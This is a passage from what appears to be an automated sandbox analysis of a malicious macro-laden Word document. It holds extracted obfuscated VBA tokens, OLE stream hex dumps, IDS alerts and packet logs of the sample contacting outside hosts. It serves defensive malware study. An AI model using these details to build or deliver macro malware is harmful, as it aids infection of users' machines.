                                            "NisSEYrcDlKQUITa"
                                            "dXFPCSYtSNB"
                                            "NeiIGCNWgICn"
                                            OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
                                            mgrwfmN.Close
                                            YVZXECEHD
                                            FLtYjKHC
                                            GfRPP.Close
                                            idbaDIr
                                            "dnUnKFHAkIOdD"
                                            "nJJzFRjEWpRikxCD"
                                            ANzGyzCD
                                            MmSDYCkJR
                                            "hKlajOujwgDFAA"
                                            "eeVVJBMGlcfXMB"
                                            RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
                                            iHKuDmaEr:
                                            "CcDmClHsnCC"
                                            "UjBKOEDRIbiWFB"
                                            QOrvJEB
                                            "sxbwAfRtWJI"
                                            UskmBJF
                                            "KqVyuQQfwTWh"
                                            tpOgXmm
                                            fiyQuiRBI
                                            gphNDVZp
                                            vEBqHrDnD
                                            PbhYVsA.Close
                                            ZMdrVHGz.Close
                                            "vVbvIHcFGEAJJ"
                                            CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
                                            KmGOADt
                                            Resume
                                            phIwFD
                                            jPJENIo
                                            AiRdGDAJ
                                            KmGOADt.Close
                                            "]an"
                                            PnolTIbAB
                                            "eEWdaDQVJJqTHgF"
                                            gxBPJB:
                                            eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
                                            FYVZFEH
                                            tzErBRFe
                                            "LvnHAGHfIhRDBRAF"
                                            NuebA:
                                            sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
                                            oQgLUI
                                            SblcDCC.Close
                                            HCvCmAcHC
                                            "eXpjHFapHaPdRJu"
                                            eepvDEaE
                                            "DBvMcNtCcMyJDDI"
                                            MHYlQAD
                                            "ekluIEBJFIgoBcGC"
                                            dXiwA
                                            "MiCjaGqJfPrI"
                                            eCIzUDyJ
                                            RyDBDK
                                            hFSyAfFrF
                                            "fDdPHEjBEnAdZqZFJ"
                                            zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
                                            "MxCpGaGqBgemCAFEJ"
                                            PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
                                            sCOIGDtD.Close
                                            uWZkeMFv
                                            gzTFLxb
                                            IePCGy
                                            swNGWdd
                                            qHKYGHlFA
                                            OIbfvEEFF
                                            CHVmaVC
                                            ZMdrVHGz
                                            TXmxvp
                                            quDoH
                                            iHKuDmaEr.WriteLine
                                            KXTliE
                                            ddanFDWJf
                                            rJEkbLH
                                            fNhiCVgGS:
                                            noebIvSiu
                                            YZllAeRe
                                            VB_Name
                                            "eXObOTlBAITEOIo"
                                            mgrwfmN:
                                            LzxxRHG
                                            inIcjJtaF
                                            EKmLA
                                            uVItICICB
                                            mgrwfmN.WriteLine
                                            KXwaABT
                                            fDZVKAAc.Close
                                            Mid(Application.Name,
                                            fmwdEMADQ
                                            lBenBDA
                                            SblcDCC
                                            mgTNFCq
                                            NuebA.WriteLine
                                            hXxQDACJA
                                            KmGOADt.WriteLine
                                            HCvCmAcHC.Close
                                            yJmmmVIAG
                                            rYbgBh:
                                            iHKuDmaEr.Close
                                            NuebA.Close
                                            hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
                                            ZMdrVHGz.WriteLine
                                            OlapGi
                                            zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
                                            "CVbRCAAhkhmcDG"
                                            HCvCmAcHC:
                                            BNmrm
                                            rYbgBh
                                            "WNFUDvHgghFdup"
                                            uRnkDGJ
                                            "qiXBsMBsLJGbX"
                                            yabVbA
                                            zBSWCKmJv
                                            bbsIZ
                                            "zdTcdOoXXUFHJK"
                                            xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
                                            RqlOZAHRJ
                                            fNhiCVgGS.WriteLine
                                            hjZwD
                                            "EgxfIDVQbJotWhj"
                                            "BUUJYAAIoJvLBLAo"
                                            PcHRGIADo
                                            wTMSLyWFG
                                            sCOIGDtD
                                            PbhYVsA:
                                            "BndJDkuVYF"
                                            KmGOADt:
                                            "RhnJRGeBNASBQHHGF"
                                            anyPG
                                            "JTSPCDjykfL"
                                            sreXHFD
                                            "XrrAwQZPjqB"
                                            hoyzuBGCP
                                            UavHTIBHo
                                            qAUhkIMz
                                            EKezHIC
                                            PjNhJNA
                                            GznGGHyG
                                            UwyYSBsBN
                                            ORLICIl
                                            cwsTFPCH
                                            "]anw["
                                            drZcHkCm
                                            hDJDJ
                                            NXbmIuHX
                                            Function
                                            "syYTHJShrguhzb"
                                            AioOpBFE
                                            xiFRA
                                            fmwdEMADQ.WriteLine
                                            gxBPJB.Close
                                            NZiApKAp
                                            gEcrV.Close
                                            "mehEFPFHcklgJDDx"
                                            iHKuDmaEr
                                            pULquU
                                            SblcDCC.WriteLine
                                            pkixJADG:
                                            xkQqDXCcD
                                            GIAKA
                                            "TubioGUTLadgXbA"
                                            "anBQXljzGenE"
                                            xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
                                            fDZVKAAc
                                            ecGmY
                                            "ptABFEZDmkMVIeD"
                                            "TBKmUCEXTUIGu"
                                            "fxSJajCGlWUEBW"
                                            rYbgBh.WriteLine
                                            DhnHIY
                                            sCOIGDtD.WriteLine
                                            tAmQHxlD
                                            tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
                                            "wypNISsWSXthFJCq"
                                            eLmLDU
                                            jENfzNH
                                            gEcrV.WriteLine
                                            Nothing
                                            "uTtCAFwHpCGF"
                                            PbhYVsA
                                            gEcrV
                                            NuebA
                                            "aqGiHISIbAoabV"
                                            fNhiCVgGS.Close
                                            jsYAGBJAF
                                            RhztCF
                                            lADFBaJ
                                            FUyIHBDFz
                                            sPkIwu
                                            ViWsSIH
                                            gxBPJB.WriteLine
                                            zZuzBZGD
                                            pkixJADG.WriteLine
                                            MznOjBB
                                            fmwdEMADQ.Close
                                            sTzDC
                                            "oLweAMoGsqVE"
                                            diCXTi
                                            GfRPP.WriteLine
                                            Error
                                            uWZkeMFv:
                                            xPBGH
                                            Attribute
                                            sySRJ
                                            "WLXLJnjItPGPZJ"
                                            "JMgUDAIEJlgyNBH"
                                            jzqBlGW
                                            CFdSBD
                                            pkixJADG.Close
                                            ibIiBF
                                            "qDaYIDDSZQMTaO"
                                            pkixJADG
                                            GfRPP:
                                            LQqlBAHD
                                            dLRiF
                                            "ImJJdfAtdFHCh"
                                            PbhYVsA.WriteLine
                                            DkLoDL
                                            RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
                                            fNhiCVgGS
                                            fmwdEMADQ:
                                            rYbgBh.Close
                                            zxgLHJSFW
                                            HCvCmAcHC.WriteLine
                                            hZCth
                                            VBA Code
                                            VBA File Name: Zdjtk46nm17voo, Stream Size: 701
                                            General
                                            Stream Path:Macros/VBA/Zdjtk46nm17voo
                                            VBA File Name:Zdjtk46nm17voo
                                            Stream Size:701
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 49 85 8d 23 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            Attribute
                                            VB_Name
                                            VBA Code

                                            Streams

                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                            General
                                            Stream Path:\x1CompObj
                                            File Type:data
                                            Stream Size:146
                                            Entropy:4.00187355764
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                            General
                                            Stream Path:\x5DocumentSummaryInformation
                                            File Type:data
                                            Stream Size:4096
                                            Entropy:0.280929556603
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . # . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 492
                                            General
                                            Stream Path:\x5SummaryInformation
                                            File Type:data
                                            Stream Size:492
                                            Entropy:3.85482742554
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 bc 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 70 01 00 00 04 00 00 00 54 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                            Stream Path: 1Table, File Type: data, Stream Size: 6412
                                            General
                                            Stream Path:1Table
                                            File Type:data
                                            Stream Size:6412
                                            Entropy:6.14518057053
                                            Base64 Encoded:True
                                            Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                            Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                            Stream Path: Data, File Type: data, Stream Size: 99192
                                            General
                                            Stream Path:Data
                                            File Type:data
                                            Stream Size:99192
                                            Entropy:7.3901039161
                                            Base64 Encoded:True
                                            Data ASCII:x . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . . . . . . D . . . . . = . . F . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . .
                                            Data Raw:78 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 524
                                            General
                                            Stream Path:Macros/PROJECT
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:524
                                            Entropy:5.52955915132
                                            Base64 Encoded:True
                                            Data ASCII:I D = " { 9 1 6 F 7 B 9 1 - 5 D 2 F - 4 2 F E - 8 5 A 0 - A 5 1 0 E E 1 5 7 0 3 4 } " . . D o c u m e n t = A 5 g d 2 1 k l f q u 9 c 6 r s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z d j t k 4 6 n m 1 7 v o o . . M o d u l e = O w p p n p 8 h a h 4 x o 7 8 8 . . E x e N a m e 3 2 = " F b 5 d 3 b h _ _ k e _ c w 4 p 7 7 " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 4 2 6 E E C 5 1 6 F E 1 A F E 1 A F E 1 A F E 1
                                            Data Raw:49 44 3d 22 7b 39 31 36 46 37 42 39 31 2d 35 44 32 46 2d 34 32 46 45 2d 38 35 41 30 2d 41 35 31 30 45 45 31 35 37 30 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 0d 0a 4d 6f 64 75 6c 65 3d 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38
                                            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 149
                                            General
                                            Stream Path:Macros/PROJECTwm
                                            File Type:data
                                            Stream Size:149
                                            Entropy:3.96410774314
                                            Base64 Encoded:False
                                            Data ASCII:A 5 g d 2 1 k l f q u 9 c 6 r s . A . 5 . g . d . 2 . 1 . k . l . f . q . u . 9 . c . 6 . r . s . . . Z d j t k 4 6 n m 1 7 v o o . Z . d . j . t . k . 4 . 6 . n . m . 1 . 7 . v . o . o . . . O w p p n p 8 h a h 4 x o 7 8 8 . O . w . p . p . n . p . 8 . h . a . h . 4 . x . o . 7 . 8 . 8 . . . . .
                                            Data Raw:41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 00 41 00 35 00 67 00 64 00 32 00 31 00 6b 00 6c 00 66 00 71 00 75 00 39 00 63 00 36 00 72 00 73 00 00 00 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 00 5a 00 64 00 6a 00 74 00 6b 00 34 00 36 00 6e 00 6d 00 31 00 37 00 76 00 6f 00 6f 00 00 00 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38 38 00 4f 00 77 00 70 00 70 00 6e 00 70 00 38 00 68
                                            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5216
                                            General
                                            Stream Path:Macros/VBA/_VBA_PROJECT
                                            File Type:data
                                            Stream Size:5216
                                            Entropy:5.49741129349
                                            Base64 Encoded:True
                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                            Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                            Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 675
                                            General
                                            Stream Path:Macros/VBA/dir
                                            File Type:data
                                            Stream Size:675
                                            Entropy:6.39671072877
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . { . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . Q . m . . . . ! O f f i c
                                            Data Raw:01 9f b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 7b 1a e4 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                            Stream Path: WordDocument, File Type: data, Stream Size: 21038
                                            General
                                            Stream Path:WordDocument
                                            File Type:data
                                            Stream Size:21038
                                            Entropy:4.09747048154
                                            Base64 Encoded:True
                                            Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . M . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . b . . . b . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 19 4d 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 52 00 00 62 7f 00 00 62 7f 00 00 19 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            01/06/21-08:45:13.475728ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                            01/06/21-08:45:14.495052ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 6, 2021 08:45:09.702562094 CET4916580192.168.2.22104.18.61.59
                                            Jan 6, 2021 08:45:09.748287916 CET8049165104.18.61.59192.168.2.22
                                            Jan 6, 2021 08:45:09.748416901 CET4916580192.168.2.22104.18.61.59
                                            Jan 6, 2021 08:45:09.751085043 CET4916580192.168.2.22104.18.61.59
                                            Jan 6, 2021 08:45:09.796603918 CET8049165104.18.61.59192.168.2.22
                                            Jan 6, 2021 08:45:09.806808949 CET8049165104.18.61.59192.168.2.22
                                            Jan 6, 2021 08:45:09.806837082 CET8049165104.18.61.59192.168.2.22
                                            Jan 6, 2021 08:45:09.806852102 CET8049165104.18.61.59192.168.2.22
                                            Jan 6, 2021 08:45:09.806866884 CET8049165104.18.61.59192.168.2.22
                                            Jan 6, 2021 08:45:09.806881905 CET8049165104.18.61.59192.168.2.22
                                            Jan 6, 2021 08:45:09.806934118 CET4916580192.168.2.22104.18.61.59
                                            Jan 6, 2021 08:45:09.806983948 CET4916580192.168.2.22104.18.61.59
                                            Jan 6, 2021 08:45:09.888216972 CET4916680192.168.2.22104.27.145.251
                                            Jan 6, 2021 08:45:09.938440084 CET8049166104.27.145.251192.168.2.22
                                            Jan 6, 2021 08:45:09.938561916 CET4916680192.168.2.22104.27.145.251
                                            Jan 6, 2021 08:45:09.938826084 CET4916680192.168.2.22104.27.145.251
                                            Jan 6, 2021 08:45:09.988883972 CET8049166104.27.145.251192.168.2.22
                                            Jan 6, 2021 08:45:09.997203112 CET8049166104.27.145.251192.168.2.22
                                            Jan 6, 2021 08:45:09.997236013 CET8049166104.27.145.251192.168.2.22
                                            Jan 6, 2021 08:45:09.997247934 CET8049166104.27.145.251192.168.2.22
                                            Jan 6, 2021 08:45:09.997263908 CET8049166104.27.145.251192.168.2.22
                                            Jan 6, 2021 08:45:09.997276068 CET8049166104.27.145.251192.168.2.22
                                            Jan 6, 2021 08:45:09.997348070 CET4916680192.168.2.22104.27.145.251
                                            Jan 6, 2021 08:45:10.062748909 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.196155071 CET4916680192.168.2.22104.27.145.251
                                            Jan 6, 2021 08:45:10.222618103 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.222837925 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.223018885 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.382577896 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383809090 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383841038 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383866072 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383888006 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383907080 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383919954 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.383925915 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383943081 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:10.383968115 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.383970976 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.383984089 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.389354944 CET4916780192.168.2.22209.59.139.39
                                            Jan 6, 2021 08:45:10.551556110 CET8049167209.59.139.39192.168.2.22
                                            Jan 6, 2021 08:45:12.532004118 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:12.797040939 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:12.797224045 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:12.797415972 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.062037945 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071660995 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071696997 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071721077 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071741104 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071764946 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071787119 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071789980 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.071801901 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071815968 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.071820021 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.071822882 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071844101 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071857929 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.071908951 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.071943998 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.336631060 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336663961 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336688995 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336709976 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336730003 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336751938 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336776018 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336786985 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.336798906 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336813927 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336818933 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.336834908 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336843014 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.336854935 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336874008 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.336877108 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336898088 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336918116 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336920023 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.336940050 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336960077 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.336960077 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.336980104 CET8049168210.86.239.69192.168.2.22
